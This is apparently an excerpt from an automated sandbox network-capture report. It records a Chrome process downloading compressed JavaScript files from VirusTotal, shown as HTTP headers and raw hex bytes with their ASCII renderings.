                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC482INData Raw: b4 d6 f1 40 49 6f 55 2a a6 44 69 47 60 e4 09 68 37 12 30 29 a1 3a 5b f4 c0 7e cc 88 47 ef c5 8c 30 6b ec 6e a4 8e 8f 25 f9 51 27 5b 56 fc ca a2 dc 53 4e 8a 62 d8 35 c2 77 91 77 32 a9 2b 1d 17 d0 21 54 2d 73 8f 8d 92 10 3a 28 f8 ad 7e b9 f9 90 26 d0 09 02 fe 55 8e bf 9f cd d6 ac f7 d1 04 4e e6 b3 9d 98 ad 8d a7 77 58 67 2c a7 b7 4d ce 79 d3 ad 20 17 f5 80 84 08 87 be ed c3 d2 f9 fd 94 d8 b7 d0 5d 24 31 ce e6 33 38 f0 6d df 85 c3 26 c9 c4 4e f2 e0 6e 8f f5 48 82 20 12 a1 fa 09 8a 0f 1f 43 8b da 53 9d cf bf 20 1d 74 3a 45 3b a9 74 d7 41 c1 68 f0 32 4c 92 34 aa 43 42 3a 92 23 4f 83 14 3b c5 8a 57 18 65 11 ec 31 3e 05 c9 c4 c7 48 51 ed 4f 1e 43 33 e3 4b 60 73 b7 c3 42 42 d1 c4 fc 5f 3c 2a 4c e7 fb fc c7 2b 91 e0 79 23 eb 1a 45 8d c1 43 44 90 23 74 1e 52 55 20
                                                                                                                                                                                                                    Data Ascii: @IoU*DiG`h70):[~G0kn%Q'[VSNb5ww2+!T-s:(~&UNwXg,My ]$138m&NnH CS t:E;tAh2L4CB:#O;We1>HQOC3K`sBB_<*L+y#ECD#tRU
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC1408INData Raw: 30 30 30 30 30 30 30 31 0d 0a da 0d 0a 30 30 30 30 63 63 32 0d 0a ea 8a 8d 28 5d 41 35 3c aa 49 ed 3d e1 3a 00 dd 85 0b 82 80 d1 5d 12 97 ab d2 52 b7 c0 ad 02 5c 7d a3 3a dd 68 ca a2 8f af 3f a5 78 f1 84 3a 70 2a cb 53 35 9f e3 ba 74 f8 1b d4 cd 48 1c 38 e1 40 75 cf 39 48 84 b2 7c 4f 54 c6 62 4d b7 08 2a 94 68 1f a0 ae 11 57 48 5c 55 d6 3a 54 05 c7 75 ae 5e 62 30 44 cd ac bb 4c 59 86 77 5d 41 d1 c3 3d 2b ce b2 2c 45 d9 0e 4a d1 55 a6 1e 97 e3 80 94 bb 92 1b 1d 7c a0 93 95 a8 92 c4 3d 1d e4 74 a8 20 e7 ab 95 ac 05 c6 c5 b3 7b 2f 73 95 fa 72 0a 2e dc c4 eb c6 07 ec 3b 10 f9 17 59 da 78 78 c8 25 a1 50 e8 5c 17 d8 16 01 51 c3 d4 c5 16 41 82 3a 52 45 1b 8e 19 a8 aa b4 c8 b2 e2 e6 75 ce 53 be d4 45 4c 44 9c 42 54 66 6b 5e ed 25 64 05 32 6d 0b 87 e0 11 48 8a e2
                                                                                                                                                                                                                    Data Ascii: 000000010000cc2(]A5<I=:]R\}:h?x:p*S5tH8@u9H|OTbM*hWH\U:Tu^b0DLYw]A=+,EJU|=t {/sr.;Yxx%P\QA:REuSELDBTfk^%d2mH
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC1408INData Raw: 4a 90 0a 6a 56 61 5e 35 f1 71 85 34 c1 27 0a de 22 44 8b 98 f3 16 6d 74 41 11 9f 1e 78 53 8c 71 29 59 ff 46 b8 94 70 df f9 27 c3 85 48 8e f2 4b 1f 97 8a d2 30 f3 9d 7a 16 b9 a4 98 7a 56 e4 45 85 4f 84 40 3e f5 cc 2f 8b 98 a9 99 4d af 1c 31 29 43 94 cb e6 7c e0 64 b8 3b 1c 96 4d dd e0 b6 cf c0 94 89 ef c0 84 84 ae de 99 da 63 2b 68 e3 c3 20 fb bb e0 ee a5 97 44 e1 6c 53 20 24 af fe 0f 1c 04 0e ae e8 da a2 c0 ce 80 2a fd 93 0d da 25 9b 6d cf 74 c3 48 8d 07 0e 54 df ea 22 cc 9b a8 fd 15 5d ed 40 fb 37 5a 3f 2a b2 82 4c 2e 22 05 b8 60 6b 8c e8 90 cc 39 86 49 25 03 78 72 62 f5 8f 27 18 65 3c 21 15 01 37 a1 1e d2 9c ee b2 5a 1b 37 b3 9e 31 4d 9b 3d 7b a4 a1 b6 1a 1a d7 e3 de 71 74 a2 4d a8 51 2b 0b e1 ee 89 ef f4 20 4f a7 ca 13 d6 53 48 ac fb 49 98 8c e5 5e ec
                                                                                                                                                                                                                    Data Ascii: JjVa^5q4'"DmtAxSq)YFp'HK0zzVEO@>/M1)C|d;Mc+h DlS $*%mtHT"]@7Z?*L."`k9I%xrb'e<!7Z71M={qtMQ+ OSHI^
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC474INData Raw: 05 e4 77 36 2c 01 f4 59 b3 15 9c 10 c4 9f 70 77 44 7d 83 ad 9e 4e 72 a5 56 1e a9 35 8a 68 3b d0 b2 5d 49 bd 3a 33 1b 20 49 53 93 34 d0 fa 43 5f 3f 83 57 2f f1 f9 41 a9 51 4a 5b e8 80 bc a1 15 38 15 0b 7f 2e 65 3f 63 09 b7 ff c6 d7 ae 4a d5 50 bb 09 cc 0b a1 17 a3 54 bc 5c 37 88 13 05 c5 65 12 08 2f cd a0 4b 70 65 08 28 e1 ef 15 42 37 e0 4d 73 4c d6 d6 b4 50 8a 59 80 19 ac 05 d0 d6 40 69 62 c4 40 72 85 fb 6c 85 26 b1 91 35 6f 28 66 22 05 1e 88 35 9b f4 f7 50 f3 ba b5 b6 f4 8e 5c 2e e2 93 a6 d4 d9 15 2f f0 dd 2a 90 56 ec 07 1f 83 43 3c e2 1e f7 28 fb 81 f7 39 7b 86 41 35 6f 48 4d eb 41 15 a2 21 e6 b6 bc 75 17 cd 7a 49 fa 3c 92 9e 55 68 be 3d 17 8c 69 c4 a6 45 46 07 bb 09 d2 fa 2b 7b 64 d0 6a 6f 2c 6c 03 df e0 fb 62 2b 64 da bf 36 5e 7c 16 56 1f 8d 9d 80 f3
                                                                                                                                                                                                                    Data Ascii: w6,YpwD}NrV5h;]I:3 IS4C_?W/AQJ[8.e?cJPT\7e/Kpe(B7MsLPY@ib@rl&5o(f"5P\./*VC<(9{A5oHMA!uzI<Uh=iEF+{djo,lb+d6^|V
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    132192.168.2.164988374.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC689OUTGET /gui/34386.8514664b2d3faf72fdd8.js HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC356INHTTP/1.1 200 OK
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 4a3a9ceeca2532dc6772a853373035dd
                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 09:40:17 GMT
                                                                                                                                                                                                                    Expires: Fri, 25 Apr 2025 09:40:17 GMT
                                                                                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                    ETag: "v5PPmg"
                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                    Age: 36911
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC1052INData Raw: 30 30 30 30 30 30 30 31 0d 0a 1f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 08 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 66 66 63 0d 0a 00 00 00 00 02 ff ec 7d 6b 7b 1b 37 b2 e6 f7 fd 15 ed 4e c6 21 7d 9a 2d b2 79 a7 4c 2b 8e ec 33 f1 59 5f b2 96 9c b3 27 1a 6d dc 24 9b 52 c7 bc 0d bb a9 4b 68 fe f7 7d ab 0a 40 a3 9b a4 e4 78 32 67 67 9f 47 c9 4c c4 c6 a5 00 14 0a 85 42 55 a1 50 4a a2 c9 d8 bf 8e 06 8b 70 f8 e9 f8 72 35 fb 74 95 fe ba 8a 7f 9d 86 f1 ac 7f 47 de e7 cf 67 e7 65 7f b1 4a 2e 4b 67 67 f5 46 bd d3 f2 5a dd 46 b3 e3 75 aa 8d 76 f5 dc 5b 77 3a 9d 6e b7 57 8a bc d4 5b 96 fb cf d6 ee 2a 89 9c 24 5d c6 c3 d4 3d bc 0a 97 ce bc bf 2c 75 da 41 ad 55 f6 12 fc 6c 37 51 be ec c5 f4 b3 da aa 37 cb de 0c 3f 9b 41 b7 5b
                                                                                                                                                                                                                    Data Ascii: 000000010000000100000001000000010ffc}k{7N!}-yL+3Y_'m$RKh}@x2ggGLBUPJpr5tGgeJ.KggFZFuv[w:nW[*$]=,uAUl7Q7?A[
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC1408INData Raw: 42 4c 37 4b ec 4d d1 d2 90 46 a9 ea 25 fe 65 3a 9d 94 4b a3 cf 9f 4b a3 fe f0 a3 f3 74 14 5f 39 bc 97 f5 dd e5 7c 85 f2 23 67 71 5b a9 3b 8b 9b 4a c3 b9 ac 80 28 9c ab 24 85 04 e4 5c 84 8b 4a e0 fc b6 4a d2 78 7c 5b c1 0a c1 d6 97 56 86 f8 4f 84 cd 78 02 26 52 89 d3 68 9a e8 a4 c1 85 10 49 02 9e 3d 1b 81 4a 9c e9 4d 25 5c a5 73 fa 3b b9 a8 54 5d 08 3d b7 93 a8 ef 5e c7 a3 f4 b2 e7 d4 3a d5 c5 cd a1 fb 8c 3b 85 ff 26 8b 70 a6 fb 76 29 7d d8 d3 3a 53 6c 25 1e ce 9d 6f d7 d5 0d 20 d0 1f e7 e9 01 41 00 a0 cb ba 06 c3 a4 3b 0c 17 71 8a 0e ff 1e 39 d3 4a d5 19 5f a3 9f 93 91 23 79 32 9c 3c 98 cb 3a 80 1c 00 53 04 ab a5 61 a1 2e f5 d5 ee 25 83 58 2d 20 1a 0d c3 24 72 9f fd f5 f4 95 73 42 bb 48 4f f7 85 00 ab ce 5d b6 76 d5 66 7a cb 50 a6 c6 4d b8 af 29 24 93 e8
                                                                                                                                                                                                                    Data Ascii: BL7KMF%e:KKt_9|#gq[;J($\JJx|[VOx&RhI=JM%\s;T]=^:;&pv)}:Sl%o A;q9J_#y2<:Sa.%X- $rsBHO]vfzPM)$
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC1408INData Raw: 5a 76 4e 40 11 79 d9 59 10 81 29 10 66 5a d9 92 9e 83 7b 35 e1 bb a5 66 88 c4 2d 1c c5 49 6a 6e d5 bb b5 ae 08 c5 21 94 e0 46 e3 3d 79 d0 78 ff 49 1a 6f a8 0a 72 ea ee af 11 8a 61 58 80 d0 95 bc 60 15 22 04 b4 a4 0f 25 0b 31 70 08 d4 90 13 46 d0 ac a8 ef 39 0e e7 2f a5 b4 2e 13 ce c2 c9 ed ef d0 22 99 52 d0 d0 87 ab 49 7a 92 2e e7 9f a2 17 61 02 b6 b2 0c 6f fb c1 93 37 61 7a e9 ff f4 ea 49 a3 29 e0 c0 07 49 b7 7e c2 02 78 7f bd 91 d4 5f 21 c7 a3 22 6b b9 fa 2e cc 09 a5 4a 65 90 e8 5d b6 ec fe 01 d9 7d 86 63 e8 1d 72 6d 08 55 4b d8 1f e4 55 2d 0a 19 05 d9 74 c8 6a c5 42 a2 16 2d 12 48 66 97 f1 68 14 cd b4 5c 76 04 4d 65 98 7d 91 ce d1 64 65 08 53 42 dc 51 34 5d a4 b7 bb 45 22 4b 9a c1 21 39 9c 14 5b 7a e6 1c e4 65 28 25 61 26 57 17 2c 37 53 bf 57 93 70 09
                                                                                                                                                                                                                    Data Ascii: ZvN@yY)fZ{5f-Ijn!F=yxIoraX`"%1pF9/."RIz.ao7azI)I~x_!"k.Je]}crmUKU-tjB-Hfh\vMe}deSBQ4]E"K!9[ze(%a&W,7SWp
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC284INData Raw: 90 6f 0f 7c 18 80 52 9a 48 85 2b 19 e9 16 be ca 6b 41 2a 29 d0 4e 81 9c 97 cb 25 e9 07 5f cd e0 3d 06 af 33 08 1a 74 46 74 60 a0 1f 01 1e 99 b9 56 d0 79 cf c0 83 98 5a a1 4f 73 e2 19 d8 e6 6c 18 f9 7f 9b bd 9a 39 62 0d 41 f9 01 72 88 c0 51 c4 e3 0a 21 09 e3 ce 9c fd 00 13 67 8a 03 be 73 19 42 3d 1e 3a 5b 0b a2 54 76 a6 51 7a 39 1f f9 6e 79 03 8d aa 5e 6f 6a be d6 bc 38 30 9b 70 98 79 a6 1d fe 58 ca 37 ee 7f e5 43 ed 12 b8 84 be 60 de a7 f1 c9 62 06 d1 2e 9f c2 78 f6 6f ff 56 9e 9f 2d cf e1 19 b8 3c d7 a6 b4 79 d6 d2 0f da c3 50 56 1e f0 84 b5 a6 5c 0c cf e2 73 f8 0f 62 1d 86 b2 28 32 f2 57 c8 66 fb f1 12 93 b8 09 79 1d 1d a5 a5 41 b9 87 a3 f0 34 4e 22 90 3c 8c 3e 57 11 92 fc f4 32 9a 95 b0 b8 ad 21 fe 42 cb 48 c1 d1 e3 56 0e 37 a2 08 86 ab 89 31 2e ea 8e
                                                                                                                                                                                                                    Data Ascii: o|RH+kA*)N%_=3tFt`VyZOsl9bArQ!gsB=:[TvQz9ny^oj80pyX7C`b.xoV-<yPV\sb(2WfyA4N"<>W2!BHV71.
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC1408INData Raw: 30 30 30 30 30 30 30 31 0d 0a 96 0d 0a 30 30 30 30 30 30 30 31 0d 0a d7 0d 0a 30 30 30 30 30 30 31 0d 0a 3f 0d 0a 30 66 66 64 0d 0a 94 62 8f f8 0b b8 8b e7 12 eb 70 3d 74 dc 94 09 b7 ca 30 c5 70 a1 59 49 59 ca 59 67 49 d8 79 fd 20 9f fc 09 f2 09 73 0e e7 d7 fe 9a fd 0c 92 d5 94 4c 89 38 d0 9d a8 5f d0 5f c3 26 22 06 bc 9e 8b a3 a1 fe 70 3d 38 25 24 3d f7 d5 bb e3 c4 f5 c2 0b a8 5e c8 38 06 46 44 c5 a6 d3 39 98 32 4c a1 b0 0d 7b 0a aa 05 d4 48 b7 3d d7 68 e4 5c a5 1e 47 7d a4 41 4f 8e 9a 30 94 7e c2 f7 6b fa 83 13 25 db 54 b9 85 f7 fa a7 eb 0d 22 ac ed 78 be ec c1 97 50 7e b9 e8 34 bb 07 51 4f f8 87 eb a5 2c bc 63 65 f5 dc 53 fd 93 ca 29 cd b0 f4 99 2d 6e ae 77 1b 2e c3 5f 97 2b 52 e0 bb ff 85 df ce 7b fa ed 7a 6c 48 ec b9 1f c8 9e 88 e1 03 f2 04 7e 47 11
                                                                                                                                                                                                                    Data Ascii: 00000001000000010000001?0ffdbp=t0pYIYYgIy sL8__&"p=8%$=^8FD92L{H=h\G}AO0~k%T"xP~4QO,ceS)-nw._+R{zlH~G
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC1408INData Raw: 8e 53 23 31 3d a9 34 45 e6 77 ee f2 ac d2 e2 d5 b0 7f 4b 27 b9 48 c6 ac 01 cb 81 fa 70 e5 5f f8 a8 16 4f 20 a6 11 47 3f 51 1c ad 04 11 54 1f 3a 72 9e 59 50 bc af 23 be ba a3 36 7b 65 ca d4 a5 8f 71 3f 22 85 fd 94 f8 b3 d0 18 a7 60 af c0 41 9a 0c 93 24 b5 bd c1 fa c9 8d 13 5e 7a 79 51 c1 83 16 4d f0 bb 84 30 03 4d cb 07 f6 46 83 e6 4a 75 10 0c 6c 23 f6 40 2d d6 08 40 d3 6d 5b 4a 61 99 f6 d2 7f 2b 45 a4 82 17 79 e2 73 a6 fd ed 76 88 93 e4 78 a4 28 40 9a 85 f2 45 bb be e9 49 34 06 e1 ac 67 26 c9 92 7f 2d 73 70 4e ba cd 8c c2 e8 f9 02 9e af b2 a1 46 a3 77 33 c3 94 79 72 15 78 8d 14 23 58 5b 09 ba 82 52 a3 90 83 a2 42 8a 12 a5 35 ec 7e 04 8d 06 54 9a a2 a5 a4 c3 06 bc a0 fc 88 54 5d c6 76 9c eb bb 9a eb bb 1d ba 5c ae 02 f7 32 12 bc 2b 43 21 67 b8 99 c9 99 00
                                                                                                                                                                                                                    Data Ascii: S#1=4EwK'Hp_O G?QT:rYP#6{eq?"`A$^zyQM0MFJul#@-@m[Ja+Eysvx(@EI4g&-spNFw3yrx#X[RB5~TT]v\2+C!g
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC1323INData Raw: 2e ce 57 da a2 c6 d0 45 0d 88 ad 2c c1 fe 4f b7 b5 8d d0 ed 5a 75 b2 44 ef 51 22 6b cd 24 b1 70 ae 2a 6b 1b 58 56 97 64 b8 1d 5a 78 98 87 5d 53 98 60 5a 64 f7 2d c8 ee db a2 3e 47 f9 ff e0 8e 3a df 3d cc 7f e2 ae 9a dc 5b 57 0e a2 fa 4e 23 e4 4d 5c 54 c9 b7 54 3e 54 de 78 d9 f0 e6 e8 00 98 74 59 6f 4c 56 5f 5e a2 2f 2f b9 2f 2b a8 0c 49 db da 77 b1 04 a0 28 be a2 5d 05 b7 f6 a0 6d 86 f2 99 ae 66 ea 25 81 f4 09 84 b9 4c f3 b4 9a 30 2d 61 23 10 8e 71 5c 3c bd 60 7b e5 6d 37 b2 f5 4c a7 68 fa 94 9b b6 ef ea 41 fa bc a9 5c c5 49 3c 88 61 d6 bc 75 06 21 2c 36 fa ae 65 65 01 67 6f 47 47 1c d0 5e ac 82 9a ed 8b ef 20 ef a8 4c 32 b3 f4 ea 44 a4 16 12 db 88 07 41 70 77 89 df 5b 04 41 a7 96 b2 ba 9a 55 18 c9 29 98 f7 0e f4 bd c7 18 de 9b a9 a4 cb a5 b4 c6 8c ea 73
                                                                                                                                                                                                                    Data Ascii: .WE,OZuDQ"k$p*kXVdZx]S`Zd->G:=[WN#M\TT>TxtYoLV_^///+Iw(]mf%L0-a#q\<`{m7LhA\I<au!,6eegoGG^ L2DApw[AU)s
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC1408INData Raw: 30 30 30 30 30 30 30 31 0d 0a ad 0d 0a 30 30 30 30 30 30 30 31 0d 0a ab 0d 0a 30 30 30 30 30 30 30 31 0d 0a c1 0d 0a 30 30 66 66 64 0d 0a 05 24 84 85 94 42 d3 51 74 c5 5c 48 3a 0a 6b e1 85 50 1a ee b9 29 cd 37 6c 48 74 1a da 47 1d 42 42 c6 cd f6 d5 b5 b8 6c ae f6 96 e4 f6 47 01 a8 d9 f9 fa 1e 64 b3 f5 f5 30 f4 0c 6f 43 d0 5b ea 5e da e3 5b 9e 36 3e 73 33 99 01 dc 7f 73 74 17 68 02 a2 ef 8f 32 63 fe b2 5d e2 e7 f4 43 fc 13 ad d7 d7 7a 73 98 7c f1 e6 d0 a9 76 1b 6d e1 ff 74 93 11 ba 7b 89 42 3f c8 4c 3e 50 b6 c1 0e f0 10 85 fe 2b a3 d0 17 43 d0 7f 4d 4c 1e cd 81 b5 f3 be 5a 7f c4 d2 49 b6 fa b2 d8 95 f1 dd d7 a3 67 d0 1d cd fa e1 47 f6 33 d7 6e e5 b9 c8 7e 77 c6 f6 dd 8e 45 a3 9c 31 11 f6 32 9d 9b f8 c0 d4 f3 ca 14 5b 16 d4 86 7a 14 8a f7 e7 ad 5f 9a b7 4b
                                                                                                                                                                                                                    Data Ascii: 00000001000000010000000100ffd$BQt\H:kP)7lHtGBBlGd0oC[^[6>s3sth2c]Czs|vmt{B?L>P+CMLZIgG3n~wE12[z_K
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC1408INData Raw: 51 47 ec f1 9c 64 4e af 28 5c b3 fb 23 0a 52 30 00 e4 c7 70 93 63 cf 64 06 ef f0 3f f1 18 27 58 89 9e 80 6a 31 ae 64 63 df bd a5 d0 4d cc 47 62 69 12 b6 51 5c f6 c6 e5 76 7c 8e e2 31 5f de c6 55 f5 05 0c 65 e1 f0 12 5d c0 4d f0 11 8c 66 14 bc 9d ae 92 8b 9a fa 6f b3 27 07 7f 9b 91 65 ef 8c 6e 20 7c db ff 8e 14 f5 df 9d 3b ff e6 d0 45 0d ed 78 27 14 69 f6 b6 80 79 96 da 7d e9 ce 32 7f f3 c1 0f b2 00 7f f0 3e 5a 69 d5 f5 21 ee fe 26 84 9a 94 8a 43 1a 34 3a 84 ad d5 6a a4 14 73 d6 be bf 81 6f 10 20 66 55 d1 38 f0 b5 64 2a 4d ed 97 37 bf 1e b0 8c 48 e9 bb 98 fa 2b 15 3b ad 92 c9 43 46 c0 a5 b3 51 be 0c 4b 5c fb f3 79 af c5 83 6e 37 d8 8e 32 15 42 ee 00 ea 39 08 31 74 ab ce 4a f7 0f 07 a7 66 5f 63 89 8e d0 fe 9c 1d 20 05 4f d7 97 d8 38 10 db 10 77 bb a8 4f e4
                                                                                                                                                                                                                    Data Ascii: QGdN(\#R0pcd?'Xj1dcMGbiQ\v|1_Ue]Mfo'en |;Ex'iy}2>Zi!&C4:jso fU8d*M7H+;CFQK\yn72B91tJf_c O8wO
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC1325INData Raw: 4d 63 96 21 70 8b d3 c8 f9 23 e0 0f a2 33 34 74 ea 3c c8 a4 c9 59 6c 80 32 90 ed 7d be 98 2d f0 b7 36 e7 21 16 55 56 df 92 e7 2e b1 d7 08 77 d1 53 6a 93 5f 96 2b b3 15 8d 07 91 9a 08 c5 6b b4 92 1e 9a 00 b5 92 f8 fc c6 de 6b ea f8 96 cb d0 ad 44 cd a8 ab f9 b1 02 25 54 c3 ba c8 c9 8a 3c 08 a0 8d a4 f5 4c dc 48 fe e7 d7 da 4d b3 00 b9 1d 6d 2e a9 fa f5 76 d3 5a 84 56 26 2e e3 42 6d e1 07 fb b2 27 58 3d d0 da ee a9 7c 03 e9 d4 5e dd 36 e0 1b ca 0c f6 54 0c 28 b3 78 68 95 ee 56 50 71 d7 30 f8 ba 6c 0f 36 73 0b 24 8c 33 97 21 b4 3a 64 85 91 5e 72 77 b6 31 93 21 46 57 91 81 13 ff e3 b1 6b 1c 6c 55 ad 5a 48 35 75 19 2b d2 54 1d dd d9 aa 64 cf 84 a9 04 2f b7 08 b3 c6 7f d0 5f 3a b6 d3 59 ae 38 8b 59 83 63 04 8e c1 0d 41 5a 4f 8a 90 72 13 65 65 23 54 cc 10 f7 8b
                                                                                                                                                                                                                    Data Ascii: Mc!p#34t<Yl2}-6!UV.wSj_+kkD%T<LHMm.vZV&.Bm'X=|^6T(xhVPq0l6s$3!:d^rw1!FWklUZH5u+Td/_:Y8YcAZOree#T


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    133192.168.2.164988474.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC689OUTGET /gui/78746.44345289eed2d4982ef7.js HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC357INHTTP/1.1 200 OK
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 6868a9da328a61a716d804b2ec1a6717
                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Date: Fri, 19 Apr 2024 14:50:53 GMT
                                                                                                                                                                                                                    Expires: Sat, 19 Apr 2025 14:50:53 GMT
                                                                                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                    ETag: "4IXFzQ"
                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                    Age: 536675
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC1051INData Raw: 30 30 30 30 30 30 30 31 0d 0a 1f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 08 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 02 0d 0a 30 30 30 30 30 30 30 31 0d 0a ff 0d 0a 30 30 30 30 30 31 0d 0a ec 0d 0a 30 66 66 35 0d 0a 7d 7b 77 d3 c8 96 ef ff f7 53 08 4d 5f 46 9a 96 45 12 42 12 1c 8c a1 13 38 70 4e 78 34 09 7d ba 3b 93 01 c5 ae c4 6a 64 c9 2d c9 09 ee c4 df fd fe f6 de 55 52 49 56 20 74 df 99 b5 66 d6 ac c5 22 76 a9 aa 54 b5 6b bf 1f 65 77 5e 28 a7 28 f3 78 54 ba bb 5e a1 92 b3 f0 52 9d ce a2 d1 a7 bd c9 3c fd 74 51 7e 98 c7 1f a6 51 9c
                                                                                                                                                                                                                    Data Ascii: 000000010000000100000001000000010000000100000001000000010000000100000001000000010000010ff5}{wSM_FEB8pNx4};jd-URIV tf"vTkew^((xT^R<tQ~Q
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC1408INData Raw: d6 af af 1b 1d 65 47 e8 b7 77 7d 7d 87 9f 58 d0 04 31 d0 06 f0 54 c6 58 5b e3 55 8e f1 fe 83 e8 54 25 58 1f 61 7b a9 51 4f 0d 88 26 31 0c a8 d4 78 1b 2d 18 cb 02 e2 5f 64 f1 d8 59 a3 99 87 65 bf bd 46 8d f0 f7 8e ff fd fb de c9 77 f7 c2 52 15 a5 a7 fc a1 bb 37 2f ca 6c ea f6 d5 0a 5a f2 7a 04 8d cc 8a 84 0c 5a 2b 90 fd 1a 8a e2 c5 c9 28 83 7c e1 24 2a bc d2 1f 4e c3 df 89 8f ec 65 f3 b4 cc 17 af a3 a9 42 6b df 95 f1 ae 1c 52 96 97 3f 2c cc eb 34 91 36 f6 2b 98 31 18 1c 0d dd 43 74 76 4e 17 8e 06 af db ef ec b8 5f 77 b4 e8 d3 ed 9b e1 fa c5 d6 41 34 5f cf e7 05 66 28 93 5b dd 86 ee 4f 31 a8 8a 8e b3 ef da 53 7f a1 b3 dd ad 2f e3 cd ea 2d 70 d7 d8 7c bc 77 12 02 e8 a3 a8 f4 8e 41 e4 5d c0 fd a4 16 e8 7f 12 16 80 86 07 4e 13 28 92 ae 72 52 f1 a0 13 e6 41 d1
                                                                                                                                                                                                                    Data Ascii: eGw}}X1TX[UT%Xa{QO&1x-_dYeFwR7/lZzZ+(|$*NeBkR?,46+1CtvN_wA4_f([O1S/-p|wA]N(rRA
